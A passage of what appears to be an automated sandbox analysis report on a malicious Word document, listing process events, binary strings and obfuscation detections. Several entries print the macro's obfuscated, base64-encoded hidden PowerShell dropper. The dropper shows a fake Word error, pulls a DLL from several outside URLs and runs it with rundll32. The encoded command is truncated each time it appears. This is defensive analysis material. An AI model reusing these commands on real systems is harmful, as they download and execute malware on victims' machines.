EAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.290931845.0000018A2C3AD000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb* source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbJ source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 0000000D.00000002.285896384.0000000010042000.00000002.00020000.sdmp, Q27V.dll.4.dr
Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.290651149.0000018A2C320000.00000004.00000001.sdmp
Source: Informacion_29.doc Initial sample: OLE summary subject = Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Informacion_29.doc Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Jwq9b1lb0hmm7 Name: Jwq9b1lb0hmm7
Document contains an embedded VBA with many randomly named variables
Source: Informacion_29.doc Stream path 'Macros/VBA/Jwq9b1lb0hmm7' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsA